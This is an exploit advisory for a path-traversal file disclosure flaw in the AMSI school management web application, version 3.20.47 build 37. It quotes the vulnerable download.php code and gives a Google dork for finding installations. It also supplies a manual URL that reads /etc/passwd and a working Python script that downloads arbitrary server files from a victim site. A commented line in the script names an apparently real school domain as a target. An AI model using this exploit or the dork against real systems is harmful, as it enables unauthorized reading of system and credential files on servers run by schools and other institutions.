AMSI 3.20.47 Build 37 File Disclosure



EKU-ID: 4461 CVE: OSVDB-ID:
Author: KnocKout Published: 2014-12-25 Verified: Verified


                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \
                        \_____  \  |    __)_ /    \  \/  
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/           
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Exploit Developed by : B3mB4m
[~] HomePage :  http://h4x0resec.blogspot.com
[~] Beautiful People :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, 
                      DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : AMSI ( Academia management solutions international )
|~Affected Version : v3.20.47 build 37
|~Software  : http://amsi.ae - http://iconnect.ae
|~RISK : Medium
|~Google Keyword/Dork :  inurl:"?load=news/search_news"
|~Tested On : [L] Kali Linux \ [R] example sites
####################INFO################################
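download.php passes the requested file path to readfile() without validation, which makes it possible to read any file on the server's local filesystem that the web server account can read.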
 #######################################################
 
### Error Line in 'download.php' ## 
 
..
    $path   =   str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
    // $path = $_GET['file']; 
    header("Content-Description: File Transfer");
    header("Content-Type: application/force-download");
    //header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));
    header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );

    @readfile($path);
..
########################################################
Example and tested on;
 
 
############################################################
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd
############################################################
=========Automatic File Source Downloader Exploit ========
##################### exploit.py ##############################

# Coded by b3mb4m 
 
import random
import os
import urllib

class B3mB4m(object):
	def example(self):
		print """

		How to use ? 
			Website:  http://VICTIM.com
			Path : /download.php?file=../../../../etc/passwd
		"""	
		
	def exploit(self):
		ask = raw_input("Website :")
		uz = raw_input("Path : ")

		#ask = "http://alnashaa.sch.ae"
		#uz = "/download.php?file=../../../../etc/passwd"

		uniq = str(random.randrange(1,1000+1))+".txt"
		filee = ask+uz

		try:
			urllib.urlretrieve(filee, uniq); 
			print "\t\nDownload complete ! "
			os.startfile(uniq)
		except:
			B3mB4m().example()	


if __name__ == '__main__':
	B3mB4m().exploit()